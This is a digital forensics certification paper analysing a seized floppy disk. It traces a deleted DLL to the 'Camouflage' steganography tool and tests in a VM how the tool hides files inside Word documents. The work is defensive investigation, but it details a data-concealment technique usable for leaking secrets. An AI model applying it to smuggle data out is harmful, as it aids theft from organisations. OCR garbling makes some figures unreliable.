

# **Global Information Assurance Certification Paper**

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## Part 1

## Background

Robert John Leszczynski, Jr., is employed by Ballard Industries, a designer of fuel cell batteries which produces specialized batteries used around the world by thousands of companies. Robert is assigned as the lead process control engineer for the project.

After several successful years of manufacturing and distributing a relatively new fuel cell battery, which is used in many applications, Ballard industries notices that many of their clients are no longer re-ordering from them.

After making several calls the vice president of sales determines that one of Ballard's major competitors, Rift, Inc., has been receiving the new orders for the same fuel cell battery which was once unique to Ballard. A full blown investigation ensues.

The investigation has not turned up very much. It is apparent that Rift, Inc. somehow has received proprietary information from Ballard industries. Ballard industries keeps a customer database of all its clients and it is feared that that information somehow got out along with other proprietary data.

The only thing out of the ordinary that has turned up is a floppy disk that was being taken out of the R&D labs by Robert Leszczynski on 26 April 2004 at approximately 4:45 pm MST, which is against company policy. The on staff security guard seized the floppy disk from Robert's briefcase and told Robert he could retrieve it from the security administrator.

## Task

The security administrator, David Keen, has asked you to analyze the floppy disk and provide a report of your findings prior to returning it to Robert. The floppy disk contains a number of files, which appear to be policy files. Your primary task is to analyze this floppy disk and provide a report to Mr Keen. Determine what is on the floppy disk and establish how it might have been used by Mr. Leszczynski.

## **Evidence Material**

The following evidential material was received:

- 3.5 inch TDK floppy disk
- Tag No: fl-260404-RJL1
- MD5: d7641eb4da871d980adbe4d371eda2ad
- Image File: fl-260404-RJL1.img.gz

As the first step the MD5 of the image file was confirmed using MD5summer:

MD5sums: Generating		
File f1-260404-RJLL.img	MD5 Ha d7641ei	sh b4da871d980adbe4d371eda2ad
Key Unprocessed OK / Done Processing Error (0 so far) O Sec	Batch (1 of 1):           100%           File:           100%           Save	File Information Path: J:\EnCase\Cases\SANS_GIAC_Fore Name: fI-260404-RJL1.img Size: 1,440.00 Kb

### Image Capture

The image was then imported into Encase (version 4.19) as follows:

- 1. The disk to be used for the evidence material was wiped using EnCase 'Wipe Disk' command and then formatted.
- 2. A new case was opened in EnCase 'SANS Forensic Part 1'
- 3. Case options were set, including default directories and date and time formats.
- 4. 'Add Raw Image' was selected, and then the image was acquired (with compression turned off). EnCase was set to =generate a MD5 hash during image acquisition.
- 5. Once imaged, the disk details were exported and the MD5 of the imported image confirmed as matching that of the original:

Name: Description: Logical Size: Physical Size: Starting Extent: File Extents: Physical Location: Evidence File: Full Path:	Floppy Disk Image Volume, Sector 0-2879 7,168 0Floppy Disk Image-S 1 9,728 Floppy Disk Image SANS Forensic Part 1	19	
File Extents	SANS I UIENSIC FAIL I	порру Бізк ішаде	
Start Sector	Sectors	Start Cluster (	Clusters
19	14		
Volume File System: Sectors per cluster: Total Sectors: Total Clusters: Free Clusters: Volume Name: OEM Version: Heads: Unused Sectors: Sectors Per FAT:	FAT12 1 2,880 2,839 1,558 RJL mkdosfs 2 0 9	Drive Type: Bytes per sector: Total Capacity: Unallocated: Allocated: Volume Offset: Serial Number: Sectors Per Track: Number of FATs: Boot Sectors:	Fixed 512 1,453,568 bytes (1.4MB) 797,696 bytes (779KB) 655,872 bytes (640.5KB) 0 408B-ED14 18 2 1
Device			

Evidence Number: File Path:	fl-260404-RJL1.img J:\EnCase\Cases\SANS_GIAC_Forensics_Task_Floppy\Evidence File	es\Floppy
Actual Date:	Disk Image.E01 09/22/04 10:07:57	
Target Date:	09/22/04 10:07:57	
Total Size:	1,474,560 bytes (1.4MB)	
Total Sectors:	2,880	
File Integrity:	Completely Verified, 0 Errors	
EnCase Version:	4.19a	
System Version:	Windows XP	
Acquisition Hash: D7641EE	34DA871D980ADBE4D371EDA2AD	
Verify Hash:	D7641EB4DA871D980ADBE4D371EDA2AD	
Notes:	Robert Leszczynski Floppy	

## Analysis

1. Examination of the disk structure (Sectors 0-191) revealed that the floppy had been formatted with the UNIX/Linux 'mkdosfs' command, as FAT12, rather than from within MS Windows. The floppy had the characters 'RJL' in its name. The floppy was not bootable.

> 000 | ë< mkdosfs....à.8.ð .... 033 | ·····)·í<@RJL FAT12 ··¾[ 066 | |¬"Àt·V´·»··Í·^ëð2äÍ·Í·ëpThis is 099 | not a bootable disk. Please inse 132 | rt a bootable floppy and press a 165 | ny key to try again ...

2. The file attributes on the image were examined:

Name:	CamShell.dll		
File Ext:	dll		
File Type:	Dynamic Link Library		
File Category:	Code\Library		
Description:	File, Deleted, Overwritter	. Archive	
Is Deleted:	•		
Last Accessed:	04/26/04		
File Created:	04/26/04 09:46:18		
Last Written:	02/03/01 19:44:16		
Logical Size:	36,864		
Physical Size:	512		
Starting Extent:	0Floppy Disk Image-C2		
File Extents:	1		
Physical Location:	16,896		
Evidence File:	Floppy Disk Image		
Hash Value:	17282ea308940c530a86	d07215473c79	
Hash Set:	IBM Standard Floppy Vol		
Hash Category:	Known		
Full Path:	SANS Forensic Part 1\Fl	oppy Disk Image	CamShell dll
Short Name:	CAMSHELL.DLL	oppy Disk image	Carriorici.ai
		onny Diek Imago)	
Original Path:	SANS Forensic Part 1\Fl	oppy Disk Image	_NDEX.HTM
File Extents			_
File Extents Start Sector	Sectors	Start Cluster	_
File Extents			_
File Extents Start Sector 33 1	<b>Sectors</b> 2	Start Cluster	_
File Extents Start Sector 33 1 Name:	Sectors 2 _NDEX.HTM	Start Cluster	_
File Extents Start Sector 33 1 Name: File Ext:	Sectors 2 _NDEX.HTM HTM	Start Cluster	-
File Extents Start Sector 33 1 Name: File Ext: File Type:	Sectors 2 _NDEX.HTM HTM Web Page	Start Cluster	-
File Extents Start Sector 33 1 Name: File Ext: File Type: File Category:	Sectors 2 _NDEX.HTM HTM Web Page Document	Start Cluster	-
File Extents Start Sector 33 1 Name: File Ext: File Type: File Category: Signature:	Sectors 2 _NDEX.HTM HTM Web Page Document Match	Start Cluster	-
File Extents Start Sector 33 1 Name: File Ext: File Type: File Category: Signature: Description:	Sectors 2 _NDEX.HTM HTM Web Page Document	Start Cluster	-
File Extents Start Sector 33 1 Name: File Ext: File Ext: File Category: Signature: Description: Is Deleted:	Sectors 2 _NDEX.HTM HTM Web Page Document Match File, Deleted, Archive	Start Cluster	-
File Extents Start Sector 33 1 Name: File Ext: File Ext: File Category: Signature: Description: Is Deleted: Last Accessed:	Sectors 2 _NDEX.HTM HTM Web Page Document Match File, Deleted, Archive • 04/26/04	Start Cluster	-
File Extents Start Sector 33 1 Name: File Ext: File Ext: File Category: Signature: Description: Is Deleted: Last Accessed: File Created:	Sectors 2 _NDEX.HTM HTM Web Page Document Match File, Deleted, Archive • 04/26/04 04/26/04 09:47:36	Start Cluster	-
File Extents Start Sector 33 1 Name: File Ext: File Ext: File Category: Signature: Description: Is Deleted: Last Accessed: File Created: Last Written:	Sectors 2 _NDEX.HTM HTM Web Page Document Match File, Deleted, Archive • 04/26/04 04/26/04 09:47:36 04/23/04 10:53:56	Start Cluster	-
File Extents Start Sector 33 1 Name: File Ext: File Type: File Category: Signature: Description: Is Deleted: Last Accessed: File Created: Last Written: Logical Size:	Sectors 2 _NDEX.HTM HTM Web Page Document Match File, Deleted, Archive • 04/26/04 04/26/04 04/26/04 04/23/04 10:53:56 727	Start Cluster	-
File Extents Start Sector 33 1 Name: File Ext: File Type: File Category: Signature: Description: Is Deleted: Last Accessed: File Created: Last Written: Logical Size: Physical Size:	Sectors 2 _NDEX.HTM HTM Web Page Document Match File, Deleted, Archive • 04/26/04 04/26/04 04/26/04 04/23/04 10:53:56 727 512	Start Cluster	_
File Extents Start Sector 33 1 Name: File Ext: File Type: File Category: Signature: Description: Is Deleted: Last Accessed: File Created: Last Written: Logical Size: Physical Size: Starting Extent:	Sectors 2 _NDEX.HTM HTM Web Page Document Match File, Deleted, Archive • 04/26/04 04/26/04 04/26/04 04/23/04 10:53:56 727 512 0Floppy Disk Image-C2	Start Cluster	_
File Extents Start Sector 33 1 Name: File Ext: File Type: File Category: Signature: Description: Is Deleted: Last Accessed: File Created: Last Written: Logical Size: Physical Size: Starting Extent: File Extents:	Sectors 2 _NDEX.HTM HTM Web Page Document Match File, Deleted, Archive • 04/26/04 04/26/04 04/26/04 04/23/04 10:53:56 727 512 0Floppy Disk Image-C2 1	Start Cluster	_
File Extents Start Sector 33 1 Name: File Ext: File Type: File Category: Signature: Description: Is Deleted: Last Accessed: File Created: Last Written: Logical Size: Physical Size: Starting Extent:	Sectors 2 _NDEX.HTM HTM Web Page Document Match File, Deleted, Archive • 04/26/04 04/26/04 04/26/04 04/23/04 10:53:56 727 512 0Floppy Disk Image-C2	Start Cluster	_
File Extents Start Sector 33 1 Name: File Ext: File Type: File Category: Signature: Description: Is Deleted: Last Accessed: File Created: Last Written: Logical Size: Physical Size: Starting Extent: File Extents:	Sectors 2 _NDEX.HTM HTM Web Page Document Match File, Deleted, Archive • 04/26/04 04/26/04 04/26/04 04/23/04 10:53:56 727 512 0Floppy Disk Image-C2 1	Start Cluster	_

2

Evidence File: Hash Value: Hash Set: Hash Category: Full Path: Short Name: File Extents Start Sector 33 1 Name: File Ext: File Type: File Category: Signature: Description: Last Accessed: File Created: Last Written: Logical Size: Physical Size: Starting Extent: File Extents: Physical Location: Evidence File: Hash Value: Hash Set: Hash Category: Full Path: Short Name: File Extents Start Sector 105 83 Name: File Ext: File Type: File Category: Signature: Description: Last Accessed: File Created: Last Written: Logical Size: Physical Size: Starting Extent: File Extents: Physical Location: Evidence File: Hash Value: Hash Set: Hash Category: Full Path: Short Name: File Extents Start Sector 188 63 Name: File Ext: File Type: File Category: Signature: Description: Last Accessed: File Created: Last Written: Logical Size: Physical Size: Starting Extent:

#### Floppy Disk Image 17282ea308940c530a86d07215473c79 IBM Standard Floppy Volume Boot Sector Known SANS Forensic Part 1\Floppy Disk Image\\_NDEX.HTM NDEX.HTM

Sectors Start Cluster Clusters 1

#### Information\_Sensitivity\_Policy.doc

doc Word Document Document Match File, Archive 04/26/04 04/26/04 09:46:20 04/23/04 14:11:10 42,496 42,496 0Floppy Disk Image-C74 1 53,760 Floppy Disk Image

99c5dec518b142bd945e8d7d2fad2004 IBM Standard Floppy Volume Boot Sector Known SANS Forensic Part 1\Floppy Disk Image\Information\_Sensitivity\_Policy.doc INFORM~1.DOC

Sectors Start Cluster Clusters 74 83 Internal\_Lab\_Security\_Policy1.doc doc Word Document Document Match File, Archive 04/26/04 04/26/04 09:46:22 04/22/04 16:31:06 32,256 32,256 0Floppy Disk Image-C157 1 96,256 Floppy Disk Image e0c43ef38884662f5f27d93098e1c607 IBM Standard Floppy Volume Boot Sector Known SANS Forensic Part 1\Floppy Disk Image\Internal\_Lab\_Security\_Policy1.doc INTERN~1.DOC

Sectors	Start Cluster	Clusters
157	63	

Internal\_Lab\_Security\_Policy.doc doc Word Document Document Match File, Archive 04/26/04 04/26/04 09:46:24 04/22/04 16:31:06 33,423 33 792 0Floppy Disk Image-C220 1 128,512

File Extents:

Physical Location:

Evidence File: Hash Value: Hash Set: Hash Category: Full Path: Short Name: File Extents Start Sector 251 66 Name: File Ext: File Type: File Category: Signature: Description: Last Accessed: File Created: Last Written: Logical Size: Physical Size: Starting Extent: File Extents: Physical Location: Evidence File: Hash Value: Hash Set: Hash Category: Full Path: Short Name: File Extents Start Sector 602 317 Name: File Ext: File Type: File Category: Signature: Description: Last Accessed: File Created: Last Written: Logical Size: Physical Size: Starting Extent: File Extents: Physical Location: Evidence File: Hash Value: Hash Set: Hash Category: Full Path: Short Name: File Extents Start Sector 919 422 Name: File Ext: File Type: File Category: Signature: Description: Last Accessed: File Created: Last Written: Logical Size: Physical Size: Starting Extent: File Extents:

Physical Location:

Floppy Disk Image b9387272b11aea86b60a487fbdc1b336 IBM Standard Floppy Volume Boot Sector Known SANS Forensic Part 1\Floppy Disk Image\Internal\_Lab\_Security\_Policy.doc INTERN~2.DOC

Sectors 220 Start Cluster Clusters 66

#### Password\_Policy.doc

doc Word Document Document Match File, Archive 04/26/04 04/26/04 09:46:26 04/23/04 11:55:26 307,935 308 224 0Floppy Disk Image-C286 1 162,304 Floppy Disk Image ac34c6177ebdcaf4adc41f0e181be1bc IBM Standard Floppy Volume Boot Sector Known SANS Forensic Part 1\Floppy Disk Image\Password\_Policy.doc PASSWO~1.DOC

Clusters

SectorsStart Cluster286602

Remote\_Access\_Policy.doc doc

Word Document Document Match File, Archive 04/26/04 04/26/04 04/26/04 04/23/04 11:54:32 215,895 216,064

0Floppy Disk Image-C888 1 470,528 Floppy Disk Image 5b38d1ac1f94285db2d2246d28fd07e8 IBM Standard Floppy Volume Boot Sector Known SANS Ecception Bort 1/Eloppy Disk Image/Bornete Access Belia

SANS Forensic Part 1\Floppy Disk Image\Remote\_Access\_Policy.doc REMOTE~1.DOC

Sectors	Start Cluster	Clusters
888	422	

Acceptable\_Encryption\_Policy.doc doc Word Document Document Match File, Archive 04/26/04 04/26/04 04/26/04 04/23/04 14:10:50 22,528 22,528 0Floppy Disk Image-C1310 1 686,592

Evidence File: Hash Value: Hash Set: Hash Category: Full Path: Short Name:	Floppy Disk Image f785ba1d99888e68f45dat IBM Standard Floppy Volu Known SANS Forensic Part 1\Flo ACCEPT~1.DOC	ume Boot Sector	Acceptable_Encryption_Policy.doc
File Extents Start Sector 1,341 44	Sectors 1,310	Start Cluster 44	Clusters

The following initial information was derived from this:

#### Timeline:

All the files on the floppy has last been accessed on 26/04/04

The files were all created between 09:46 & 09:47 hours on 26/04/04

The floppy boot sector was created and last accessed on 25/04/04

The 'camshell.dll' file was last written at 19:44 hours on 03/02/01

The remaining files were last written between 16:31 hours on 22/04/04 and 14:10 on 23/04/04

#### File Sizes:

Other than the two deleted files, there appears to be a discrepancy between the logical and physical file sizes for the following files, which were extracted from the image for further analysis:

- Internal\_Lab\_Security\_Policy.doc
- Password\_Policy.doc
- Remote\_Access\_Policy.doc

## Identification of 'CamShell.dll'

- 3. Examination of the contents of file 'CamShell.dll' revealed:
  - References to 'CamouflageShell' and 'Camouflage.exe'.
  - A reference to 'C·:·\·M·y· ·D·o·c·u·m·e·n·t·s·\·V·B·
     ·P·r·o·g·r·a·m·s·\·C·a·m·o·u·f·l·a·g·e·\·S·h·e·l·l·\·C·a·m·o·u·f·l·a·g·e·S·
     h·e·l·l·.·v·b·p'
  - A reference to 'S·o·f·t·w·a·r·e·\·C·a·m·o·u·f·l·a·g·e·\·S·e·t·t·i·n·g·s'
  - A reference to 'C:\WINDOWS\SYSTEM\MSVBVM60.DLL\3....VBRUN' indicating that the program was perhaps using the Visual Basic run time library.

#### • A reference to

 $\label{eq:comments} \begin{array}{l} ``Comments \cdots h \cdot t \cdot p \cdot : / \cdot / \cdot w \cdot w \cdot w \cdot c \cdot a \cdot m \cdot o \cdot u \cdot f \cdot h \cdot a \cdot g \cdot e \cdot \cdot f \cdot r \cdot e \cdot e \cdot s \cdot e \cdot r \cdot v \cdot e \cdot . \cdot c \cdot o \cdot . \cdot u \cdot k \cdots T \cdot 2 \cdots C \cdot o \cdot m \cdot p \cdot a \cdot n \cdot y \cdot N \cdot a \cdot m \cdot e \cdots \cdot T \cdot w \cdot i \cdot s \cdot t \cdot e \cdot d \cdot \cdot P \cdot e \cdot a \cdot r \cdot P \cdot r \cdot o \cdot d \cdot u \cdot c \cdot t \cdot i \cdot o \cdot n \cdot s \cdots \circ \hat{\cdot} \cdots F \cdot i \cdot l \cdot e \cdot D \cdot e \cdot s \cdot c \cdot r \cdot i \cdot p \cdot t \cdot i \cdot o \cdot n \cdots K \cdot e \cdot e \cdot p \cdot s \cdot f \cdot i \cdot l \cdot e \cdot s \cdot c \cdot o \cdot n \cdot t \cdot a \cdot i \cdot n \cdot i \cdot n \cdot g \cdot s \cdot e \cdot n \cdot s \cdot i \cdot t \cdot i \cdot v \cdot e \cdot i \cdot n \cdot f \cdot o \cdot r \cdot m \cdot a \cdot t \cdot i \cdot o \cdot n \cdot s \cdot a \cdot f \cdot e \cdot f \cdot r \cdot o \cdot m \cdot p \cdot r \cdot y \cdot i \cdot n \cdot g \cdot g \cdot a \cdot l \cdot C \cdot o \cdot p \cdot y \cdot r \cdot i \cdot g \cdot h \cdot t \cdot (\cdot c \cdot) \cdot e \cdot g \cdot a \cdot l \cdot C \cdot o \cdot p \cdot y \cdot r \cdot i \cdot g \cdot h \cdot t \cdot (\cdot c \cdot) \cdot \end{array}$ 

·2·0·0·0·-·2·0·0·1· ·b·y· ·T·w·i·s·t·e·d· ·P·e·a·r· ·P·r·o·d·u·c·t·i·o·n·s·,· ·A·l·l· ·r·i·g·h·t·s· ·r·e·s·e·r·v·e·d·

 $\begin{array}{l} \cdot w \cdot o \cdot r \cdot l \cdot d \cdot w \cdot i \cdot d \cdot e \cdot \ldots \otimes \cdots \otimes r \cdot r \cdot o \cdot d \cdot u \cdot c \cdot t \cdot N \cdot a \cdot m \cdot e \cdot \cdots \cdot C \cdot a \cdot m \cdot o \cdot u \cdot f \cdot l \cdot a \cdot g \cdot e \cdot \cdots \\ \cdot 4 \cdot \cdots \cdot F \cdot i \cdot l \cdot e \cdot V \cdot e \cdot r \cdot s \cdot i \cdot o \cdot n \cdot \cdots 1 \cdot \ldots 0 \cdot 1 \cdot \ldots 0 \cdot 0 \cdot 0 \cdot 0 \cdot 1 \cdots \otimes \cdots \otimes r \cdot r \cdot o \cdot d \cdot u \cdot c \cdot t \cdot V \cdot e \cdot r \cdot s \cdot i \\ \cdot o \cdot n \cdot 1 \cdot \ldots 0 \cdot 1 \cdot \ldots 0 \cdot 0 \cdot 0 \cdot 1 \cdots 4 \cdot \cdots \cdot l \cdot n \cdot t \cdot e \cdot r \cdot n \cdot a \cdot l \cdot N \cdot a \cdot m \cdot e \cdots \cdot C \cdot a \cdot m \cdot S \cdot h \cdot e \cdot l \cdot l \cdot \cdots \\ D \cdot \cdots \cdot O \cdot r \cdot i \cdot g \cdot i \cdot n \cdot a \cdot l \cdot F \cdot i \cdot l \cdot e \cdot n \cdot a \cdot m \cdot e \cdots \cdot C \cdot a \cdot m \cdot S \cdot h \cdot e \cdot l \cdot l \cdot \cdots \\ O \cdot r \cdot i \cdot g \cdot i \cdot n \cdot a \cdot l \cdot F \cdot i \cdot l \cdot e \cdot n \cdot a \cdot m \cdot e \cdots \cdot C \cdot a \cdot m \cdot S \cdot h \cdot e \cdot l \cdot l \cdot \cdots \\ O \cdot L \cdot E \cdot S \cdot e \cdot l \cdot f \cdot R \cdot e \cdot g \cdot i \cdot s \cdot t \cdot e \cdot r' \end{array}$ 

4. The URL

'h·t·t·p·:·/·/·w·w·w·.·c·a·m·o·u·f·l·a·g·e·.·f·r·e·e·s·e·r·v·e·.·c·o·.·u·k' found nothing, but a web search for 'T·w·i·s·t·e·d· ·P·e·a·r·



Camouflage is described as follows:

#### What is Camouflage?

Camouflage allows you to hide files by scrambling them and then attaching them to the file of your choice. This camouflaged file then looks and behaves like a normal file, and can be stored, used or emailed without attracting attention.

For example, you could create a picture file that looks and behaves exactly like any other picture file but contains hidden encrypted files, or you could hide a file inside a Word document that would not attract attention if discovered. Such files can later be safely extracted.

For additional security you can password your camouflaged file. This password will be required when extracting the files within. You can even camouflage files within camouflaged files.

Camouflage was written for use with Windows 95, Windows 98, Windows ME, Windows NT and Windows 2000, and is simple to install and use.

The Camouflage FAQ additionally reveals the following:

#### Does the recipient of a camouflaged file needs to have Camouflage installed on their PC?

Yes. Users without Camouflage installed cannot extract from camouflaged files.

Therefore both the originator and recipient must have Camouflage installed.

# 10. I've forgotten my password and can't uncamouflage a file. What can I do?

Camouflage always asks you for a password whether the file is camouflaged or not, or whether it is a camouflaged file with a password or not. This is because Camouflage doesn't give the game away that a file may be camouflaged. For security reasons we cannot release a program to reveal passwords in camouflaged files. If you forget your password we can't usually help you.

Be careful when typing in passwords - check your CAPS LOCK because Camouflage passwords are case-sensitive.

Appears to suggest that the encryption cannot be easily broken.

Screen Shot from Web Site:

Name		Size	Modified	Attributes
CV.doc		28 KB	11/10/2000 7:01:01 PM	Α
Boss.gif	0	8 KB	12/02/2001 5:27:27 PM	A
Expenses.xls	<u>O</u> pen	10 KB	01/02/2001 7:50:50 PM	A
Passwords.txt	Properties	1 KB	29/11/2000 9:19:19 PM	

Downloading the file reveals the following:

#### Camouflage v1.2.1 - final version (<u>Screenshot</u>) (Windows 95, 98, NT, 2000, ME)

Download Camouflage as a self-extracting EXE (2,655 KB)

New features include:

Users can now uncamouflage multiple files in one session by selecting several files in Windows Explorer.

New option to write-protect camouflaged files (by default), therefore making them safer.

'Settings' button appears on first screen.

The version of Camouflage that was used to camouflage the files is now displayed.

Easier installation (self-extracting EXE version).

Many other miscellaneous enhancements.

Completely compatible with all previous versions of Camouflage.

The File Camou121.exe was downloaded and subject to a MD5 Checksum:

MD5sums: Generating		
File Camoul21.exe	MD5 Ha. c62b05	5h D117c2cba3518e5a734fedef1f
Key Unprocessed OK / Done Processing Error (0 so far) 0 Sec	Batch (1 of 1):           100%           File:           100%           Save	File Information Path: J:\EnCase\Cases\SANS_GIAC_Fore Name: Camou121.exe Size: 2,654.50 Kb

				9		1
New Open	Favorites Add		1100	View	Install	Wizard
Vame 🔺	Type EX File	Modified 23/02/1999 11:45	Size 296,674	Ratio 0%	Packed 295,840	Path
ISDel.exe	Application	27/10/1998 13:06	290,674	63%	10,300	
Setup.dll	Application E	29/09/1998 16:34	34,816	64%	12,629	
_sys1.cab	Cabinet File	29/03/2001 22:14	175,466	0%	174,816	
sys1.hdr	HDR File	29/03/2001 22:14	4,046	69%	1,253	
_user1.cab	Cabinet File	29/03/2001 22:14	48,095	1%	47,758	
_user1.hdr	HDR File	29/03/2001 22:14	4,531	69%	1,414	
Data.tag	TAG File	29/03/2001 22:14	113	4%	109	
data1.cab	Cabinet File	29/03/2001 22:14	1,895,352	0%	1,892,	
data1.hdr	HDR File	29/03/2001 22:14	6,637	65%	2,318	
lang.dat	DAT File	12/01/1999 11:34	23,541	65%	8,133	
ayout.bin	AVG Update	29/03/2001 22:14	629	60%	249	
os.dat	DAT File	27/07/1998 17:41	450	62%	169	
Readme.txt	Readme Doc	05/11/2001 21:40	10,914	66%	3,702	
Setup.bmp	Bitmap Image	01/12/2000 20:13	229,254	18%	187,402	
Setup.exe	Install Applic	12/01/1999 12:42	73,728	54%	34,108	
Setup.ini	Configuratio	29/03/2001 22:14	100	0%	100	
setup.ins	Internet Co	29/03/2001 22:14	59,860	75%	14,871	
🗊 setup.lid	LID File	29/03/2001 22:14	49	8%	45	
1177 (1880-1971) (1890-1971)	_					
lected 0 files, 0 bytes		Total 19 files, 2	,825KB			00

#### The contents of the file were examined using WinZip as follows:

The zipped file was extracted to a new folder using Winzip (rather than running the self extracting archive). The files were then again MD5'd:

🛃 MD5sums: Generating	
File	MD5 Hash
_inst32i.ex_	6229a86a1d291c311da49a7d69a49a1f
_ISDel.exe	51161bf79f25ff278912005078ad93d5
_Setup.dll	ecacc9ab09d7e8898799fe5c4ebbbdd2
_sysl.cab	70422405572f674437236e6a055eff2d
_sysl.hdr	917d579c98a04cd2d5e16b904aa0cbac
_userl.cab	b0be02f24f7509d04f039d54c4e28a18
_userl.hdr	0f190c4847d1d0980a4fbe8ca80deb7f
O DATA. TAG	013f337c07031f189e270a336206b1d0
e datal.cab	97db73ed99a5892c490a89daaa588ec9
🔵 datal.hdr	615ac9433d57662c6fa2709ele08c88c
lang.dat	70627bd56fe92a5c97027cbbd88bacd0
layout.bin	87032452941f0e75b4918a77a4ccdcef
os.dat	478f65a0b922b6ba0a6ce99eld15c336
Readme.txt	b075733804ffedf19eb4b7180bbd2ed3
Setup.bmp	773efac7f1023b9a4879e36dbe72149a
Setup.exe	71e6dd8a9de4a9baf89fca951768059a
SETUP. INI	7ce7bc3c389619fe2ab23a0d11c73953
estup.ins	eebb82eddf391b7f43b61cdf10da47be
🕒 setup.lid	1b79748e93a541cc1590505b6c72828a
Key	Batch (19 of 19):
	Path:
🔵 OK/Done	100%         J:\EnCase\Cases\SANS_GIAC_Fore           File:         Name:
Processing	
	100% setup.lid Size:
🛑 Error (0 so far)	Save Close 0.05 Kb
0 Sec	

The files were then transferred to a VMWare Windows XP client, which had been newly created and of which a snapshot had been taken using Winalysis. The setup program was then run, whilst the file system and registry were being monitored by 'filemon' and 'regmon' from 'http://www.sysinternals.com'. These files were run from a Windows Forensic CDROM which had been previously created with a number of tools and was collectively MD5'd as C7131AAE5690BF3E6C69B8D6BAAAD04.

Winalysis reported that the following files had been installed by the Camouflage installer:

• C:\Program Files\Camouflage

- C:\Program Files\Camouflage\Camouflage.exe
- C:\Program Files\Camouflage\CamShell.dll
- C:\Program Files\Camouflage\Readme.txt
- C:\Program Files\Camouflage\Uninst.isu
- C:\WINDOWS\IsUninst.exe
- C:\WINDOWS\system32\MSCOMCTL.OCX
- C:\WINDOWS\Prefetch\SETUP.EXE-1D8BF16A.pf
- C:\WINDOWS\Prefetch\\_INS5576.\_MP-20606417.pf
- C:\WINDOWS\Prefetch\\_ISDEL.EXE-39FDE057.pf

The file size of the following files had also changed:

- C:\WINDOWS\system32\wbem\Logs\wmiadap.log
- C:\WINDOWS\system32\config\software
- C:\WINDOWS\system32\config\system

The following, of interest, new Registry Keys had also been added:

- HKLM\SOFTWARE\Twisted Pear Productions
- HKLM\SOFTWARE\Twisted Pear Productions\Camouflage
- HKLM\SOFTWARE\Twisted Pear Productions\Camouflage\1.2.1
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninsta II\Camouflage
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Camouflage.exe
- HKLM\SOFTWARE\Classes\CamouflageShell.ShellExt
- HKLM\SOFTWARE\Classes\CamouflageShell.ShellExt\Clsid
- HKLM\SOFTWARE\Classes\CLSID\{8E3867A3-8586-11D1-B16A-00C0F0283628}.....
- HKLM\SOFTWARE\Classes\\*\shellex\ContextMenuHandlers\Ca mouflage

 HKLM\SOFTWARE\Classes\TypeLib\{35FE0039-0582-11D4-00805F49B06B}....

The value in the following Registry Key changed, indicating that a new Cryptographic Seed Value had been generated:

• HKLM\SOFTWARE\Microsoft\Cryptography\RND\Seed

Examination of the system, following the install revealed the following:

- A new program menu had been added 'Camouflage', with entries for 'Camouflage Readme', 'Camouflage Settings', 'Camouflage Web Site' & 'Twisted Pear Web Site'.
- Right clicking on a file revealed two new menu options: 'Camouflage' & Uncamouflage'.
- The Camouflage Application had been installed in C:\Program Files\Camouflage as follows:
  - o Camouflage.exe 217,088 bytes Version 1.2.0.1
  - Camshell.dll 36,864 bytes Version 1.1.0.1
  - Readme.txt 11,649 bytes No version
  - Uninst.isu
     19,707 bytes No version

The files were MD5 checksum'd as follows:

MD5sums: Generating		
File	MD5 Hash	
Camouflage.exe	9f08258a80d578a0flcc38fe4c2aebł	5
CamShell.dll	4e986ab0909d2946bed868b5f896906	5f
Readme.txt	0c25ad7792d555b6c8c37c77ceb9e22	24
Uninst.isu	c55e256ff5b8382ef527e8980929d2b	o7
Key	- File Information	3
	Batch (4 of 4):	
OK / Done	100% C:\Program Files	NCamouflage
	File: Name:	
	100% Uninst.isu	
Error (0 so far)	Save Close 19.25 Kb	
0 Sec	Save Close 19.25 Kb	

To confirm that partial file 'Camshell.dll' found on the floppy was the same file as that downloaded from the Camouflage Web Site, the file

#### **Control test**

A MS Word test host file was created:

host.doc 25,088 bytes

Camouflage was then used to hide the file:

Payload.doc 24,064 bytes

Within the host.doc file. The password 'test' was used.

MD5sums: Generating			
File	MD	95 Hash	
e host.doc	fl	45beb2aea6745d80679f402daf5066	
payload.doc	6de7c3d0d5b9e1734255d2e01a6c50eb		
Key Unprocessed	Batch (2 of 2):	File Information Path: J:\EnCase\Cases\SANS_GIAC_Fore	
	File:	Name:	
	100%	payload.doc	
<ul> <li>Error (0 so far)</li> <li>O Sec</li> </ul>	Save Close	Size: 23.50 КЬ	

The files were transferred to the VMW are Windows XP client, of which a new snapshot had been taken using Winalysis. The camouflage program was then run, whilst the file system and registry were being monitored by 'filemon' and 'regmon'. These files were run from a Windows Forensic CDROM which had been previously created with a number of tools and was collectively MD5'd as C7131AAE5690BF3E6C69B8D6BAAAD04.

Once the payload file is placed inside the host file, the resultant file is saved as:

Host2.txt 50,007 bytes

This file is marked as 'read only', whereas the original host.doc was not (camouflage optional setting). An MD5 check of the original files revealed that these had not changed.

### **Registry Activity**

'regmon' revealed the following Registry activity (In particular SetValue & CreateKey requests were examined):

- Camouflage appeared to be storing values in the Windows Cryptographic Seed key, and several new SCHANNEL Registry Key were created.
- Camouflage was setting some values within its own key.
  - HKEY\_CURRENT\_USER\Software\Camouflage\CamouflageFil e contained the name of the camouflage host file (host.doc).
  - HKEY\_CURRENT\_USER\Software\Camouflage\OutputFile contained the name of the new output file created.
  - The name of the payload (hidden) file was not recorded.
- The plain text 'test' was not stored in the registry.

### File Activity

'filemon' revealed the following file system activity (In particular Set Information, Execute, Create & Write requests were examined):

- A temporary file, located in the 'Administrator\Local Settings\Temp' folder was used to store some information, but this was deleted once the program finished with it.
- 'Wordpad' was used to manipulate the test files.
- The Microsoft Base Cryptographic Provider 'rsaenh.dll' was used by camouflage.exe.

#### Uncamouflage

On uncamouflaging the original file 'payload.doc' it was MD5'd and this confirmed that the file was unchanged.

MD5sums: Generating		
File payload.doc		Hash C3d0d5b9e1734255d2e01a6c50eb
Key Unprocessed OK / Done Processing Error (0 so far) O Sec	Batch (1 of 1):           100%           File:           100%           Save	File Information Path: C:\test folder1\ Name: payload.doc Size: 23.50 Kb

#### Examination of Host File

Next the host file 'host2.doc' was examined with a Hex editor (WinHex), and compared to the original file 'host.doc' with the following results:

- The two files were identical until the end of the 'host.doc' file at offset 0006200. Then the 'host2.doc' file contained additional information, in what appeared to be encrypted format. In all the following test cases, only data in this additional section changes e.g. the host file remained unaltered.
- In the second test the same files were used, but the password was left blank.
  - 1. A:\host6.doc: 50,007 bytes
  - 2. A:\host2.doc: 50,007 bytes

Offsets: decimal

25098:	7F	6A
